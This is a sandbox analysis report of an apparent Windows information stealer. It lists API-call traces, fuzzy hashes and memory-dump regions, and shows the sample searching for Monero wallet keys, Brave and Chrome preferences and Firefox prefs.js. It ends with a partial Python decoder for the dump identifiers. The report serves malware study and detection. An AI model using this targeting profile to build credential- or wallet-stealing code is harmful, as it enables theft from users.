                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 03408ecc4fee333a27eecf74150d8f4e594fcc1243364319a177f068100fd5e4
                                        • Instruction ID: 188562dde33a426930c5f75adb70b4b99b8385defb0f471bc7fdd1358c461682
                                        • Opcode Fuzzy Hash: 03408ecc4fee333a27eecf74150d8f4e594fcc1243364319a177f068100fd5e4
                                        • Instruction Fuzzy Hash: C1F0E2B1641208BBE7149BA4AC49FAEB7E8E705B15F300448F904E3280D5719E40DBA4
                                        APIs
                                          • Part of subcall function 00A578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57910
                                          • Part of subcall function 00A578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A57917
                                          • Part of subcall function 00A578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A5792F
                                          • Part of subcall function 00A57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A411B7), ref: 00A57880
                                          • Part of subcall function 00A57850: RtlAllocateHeap.NTDLL(00000000), ref: 00A57887
                                          • Part of subcall function 00A57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A5789F
                                        • ExitProcess.KERNEL32 ref: 00A411C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: ba2836f2f61c5dfa815cd08f09563504f8526af4846810bba1ad2f727341b48c
                                        • Instruction ID: c241297842ee1e5b144ef2545f1296901b0a5ad3ad0dc97ed9ce1906e105fe5a
                                        • Opcode Fuzzy Hash: ba2836f2f61c5dfa815cd08f09563504f8526af4846810bba1ad2f727341b48c
                                        • Instruction Fuzzy Hash: E7E012B591430157DE0077B4BD0AB2E329C6B54387F040529FF05E3102FE39E885866E
                                        APIs
                                        • wsprintfA.USER32 ref: 00A538CC
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A538E3
                                        • lstrcat.KERNEL32(?,?), ref: 00A53935
                                        • StrCmpCA.SHLWAPI(?,00A60F70), ref: 00A53947
                                        • StrCmpCA.SHLWAPI(?,00A60F74), ref: 00A5395D
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A53C67
                                        • FindClose.KERNEL32(000000FF), ref: 00A53C7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 222e2dd1f18fd7acc568492311b180df23bae02f8cadcace2d5364d7e942b6c6
                                        • Instruction ID: 61efe1752c5136ced0887f5a90871ba58452b67d7f7cafb2586ecc77c49e625e
                                        • Opcode Fuzzy Hash: 222e2dd1f18fd7acc568492311b180df23bae02f8cadcace2d5364d7e942b6c6
                                        • Instruction Fuzzy Hash: 25A135B2900218ABDF24DF64DD85FEE7378BB98301F044589FA0D96141EB759B88CF66
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00A60B32,00A60B2B,00000000,?,?,?,00A613F4,00A60B2A), ref: 00A4BEF5
                                        • StrCmpCA.SHLWAPI(?,00A613F8), ref: 00A4BF4D
                                        • StrCmpCA.SHLWAPI(?,00A613FC), ref: 00A4BF63
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4C7BF
                                        • FindClose.KERNEL32(000000FF), ref: 00A4C7D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-726946144
                                        • Opcode ID: d65c7aaec9f3e784c1ccc44bd4c09a2905d38fb12cbbb457f7fd0005f573c06b
                                        • Instruction ID: 21c56efec867dba9519a0fe25f2f5d2918145206f5804d3af1545da8f4e5d326
                                        • Opcode Fuzzy Hash: d65c7aaec9f3e784c1ccc44bd4c09a2905d38fb12cbbb457f7fd0005f573c06b
                                        • Instruction Fuzzy Hash: AA425672A10104ABDB14FB70DE56EED737CBFA4301F404658B90A96191EF34AB4DCBA2
                                        APIs
                                        • wsprintfA.USER32 ref: 00A5492C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A54943
                                        • StrCmpCA.SHLWAPI(?,00A60FDC), ref: 00A54971
                                        • StrCmpCA.SHLWAPI(?,00A60FE0), ref: 00A54987
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A54B7D
                                        • FindClose.KERNEL32(000000FF), ref: 00A54B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 7bf42351ba7253a27fdda3ae7a4c896f4dd72749536fd66be902c62b9e099755
                                        • Instruction ID: 249fa447ce8af88f89297dccbb34106e62a385fafb96c528426a36cf2745f617
                                        • Opcode Fuzzy Hash: 7bf42351ba7253a27fdda3ae7a4c896f4dd72749536fd66be902c62b9e099755
                                        • Instruction Fuzzy Hash: EF6155B1910218ABDB24EBB0DC45FEE737CBB48701F044589F60996141EB75EB89CFA5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A54580
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A54587
                                        • wsprintfA.USER32 ref: 00A545A6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A545BD
                                        • StrCmpCA.SHLWAPI(?,00A60FC4), ref: 00A545EB
                                        • StrCmpCA.SHLWAPI(?,00A60FC8), ref: 00A54601
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5468B
                                        • FindClose.KERNEL32(000000FF), ref: 00A546A0
                                        • lstrcat.KERNEL32(?,0160EAF0), ref: 00A546C5
                                        • lstrcat.KERNEL32(?,0160DE40), ref: 00A546D8
                                        • lstrlen.KERNEL32(?), ref: 00A546E5
                                        • lstrlen.KERNEL32(?), ref: 00A546F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 196247e1f5ff97a369fc9df323855009eaed38268017a140219f2d3b0ac8825f
                                        • Instruction ID: c4d73ef6f805b6a777a54cd8dbb3ef46e60193c23aceb17fd4b7edfd9e2dd719
                                        • Opcode Fuzzy Hash: 196247e1f5ff97a369fc9df323855009eaed38268017a140219f2d3b0ac8825f
                                        • Instruction Fuzzy Hash: DE5166B5910218ABD724EB70DD89FEE737CBB58301F404589F60996190EB749BC8CFA6
                                        APIs
                                        • wsprintfA.USER32 ref: 00A53EC3
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A53EDA
                                        • StrCmpCA.SHLWAPI(?,00A60FAC), ref: 00A53F08
                                        • StrCmpCA.SHLWAPI(?,00A60FB0), ref: 00A53F1E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5406C
                                        • FindClose.KERNEL32(000000FF), ref: 00A54081
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: b807be5ed19fb4c4d0514c8bcbaed11ce4f10a7b9e4b047f1ed1bcedbcc0f07c
                                        • Instruction ID: 4bd653ea469b44cb767f485deff31c35c1f2a9c32facfb021752007e405e3793
                                        • Opcode Fuzzy Hash: b807be5ed19fb4c4d0514c8bcbaed11ce4f10a7b9e4b047f1ed1bcedbcc0f07c
                                        • Instruction Fuzzy Hash: 0A516BB2900218EBDB24EBB0DD45FEE737CBB58301F004589B65996080EB75EB89CF65
                                        APIs
                                        • wsprintfA.USER32 ref: 00A4ED3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A4ED55
                                        • StrCmpCA.SHLWAPI(?,00A61538), ref: 00A4EDAB
                                        • StrCmpCA.SHLWAPI(?,00A6153C), ref: 00A4EDC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4F2AE
                                        • FindClose.KERNEL32(000000FF), ref: 00A4F2C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: c3b95895bd81b9d4cf65a7152431b7d98f4c41f18c691b94b6a4713ef05a400e
                                        • Instruction ID: b066be49ceb308101cd0ddf29d9335bfc613137ed01741a9ec3e118fd4a7c47c
                                        • Opcode Fuzzy Hash: c3b95895bd81b9d4cf65a7152431b7d98f4c41f18c691b94b6a4713ef05a400e
                                        • Instruction Fuzzy Hash: 95E1B672A111189AEB54FB60DD51EEE7338BF64301F404699B90B62092EF306F8ECF56
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A615B8,00A60D96), ref: 00A4F71E
                                        • StrCmpCA.SHLWAPI(?,00A615BC), ref: 00A4F76F
                                        • StrCmpCA.SHLWAPI(?,00A615C0), ref: 00A4F785
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4FAB1
                                        • FindClose.KERNEL32(000000FF), ref: 00A4FAC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 3052828c356465711fb326483e856c73f821602ba03a26889ce307fa3e2fc919
                                        • Instruction ID: 9ab5ec8d26c1e0e70d384df21688e87a20d5541f8c2a39b61e905c0a79968b40
                                        • Opcode Fuzzy Hash: 3052828c356465711fb326483e856c73f821602ba03a26889ce307fa3e2fc919
                                        • Instruction Fuzzy Hash: 70B16475A001189FDB24FF60DD95FEE7778BFA4301F4086A8A80A96141EF306B4DCB92
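The dump identifiers listed under Memory Dump Source in each function record are dotted fixed-width fields. The following decoder is an added example, not Joe Sandbox tooling, and its field layout is an assumption inferred from the report rather than a documented format: the fourth field is taken as the region base (it equals the addresses the report cites as offsets inside the 0x00A40000 image), the fifth as the Win32 PAGE_* protection value, and the seventh as the region type (0x01000000 is MEM_IMAGE, consistent with "based on PE: true"); the other fields are treated as opaque indices. The sample list is the fifteen identifiers from the record above. The practitioner's point it surfaces: which dumped image regions were writable and executable at the time of the dump, which is what you would expect for an unpacked, self-modifying code section.

```python
# Added example (not tooling from the Joe Sandbox report): decode the *.sdmp
# identifiers listed under "Memory Dump Source" and flag regions that were
# writable and executable when dumped. Field layout is an ASSUMPTION inferred
# from the report: 4th field = region base (matches the report's offsets),
# 5th = Win32 PAGE_* protection, 7th = region type (0x01000000 = MEM_IMAGE).
# Remaining fields are treated as opaque indices.
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

# Win32 SDK values
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
WRITABLE_EXECUTABLE = {0x40, 0x80}

DUMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
    r"([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$"
)

# Sample input: the identifiers from the function record above.
SAMPLE_DUMPS = [
    "00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int       # assumed region base address
    protect: int    # assumed PAGE_* value
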